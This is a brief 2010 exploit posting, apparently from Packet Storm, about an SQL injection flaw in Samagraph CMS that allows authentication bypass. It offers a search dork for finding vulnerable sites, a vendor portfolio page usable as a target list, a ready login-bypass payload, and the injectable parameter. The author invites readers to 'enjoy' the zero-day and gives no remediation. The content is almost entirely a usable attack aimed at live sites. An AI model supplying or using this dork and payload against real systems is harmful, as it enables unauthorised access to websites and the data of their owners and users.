Samagraph CMS suffers from a remote SQL injection vulnerability that allows for authentication bypass.
a1de667bb9dd361924e1e3179944d19d# Title : Sql injection in samagraph product
# Date : 11-03-2010
# Author : K053
# Vendor : http://www.samagraph.com/
____________________________________________________________________________________________
Cms is fully vulnerable, but just enjoy this zer0day flaw :))
-------------------------------------------------------------
Dork : inurl:"fa/inside.aspx?g="
list : http://www.samagraph.com/N2/portfolio.htm
login bypass : ' or '1'='1'--
Vuln : http://blahblah/inside.aspx?g=[sqli]
____________________________________________________________________________________________
>> we hate disclosing but sometimes fool vendor make us !!
____________________________________________________________________________________________
© 2010 Packet Storm. All rights reserved.
Comments
No comments yet, be the first!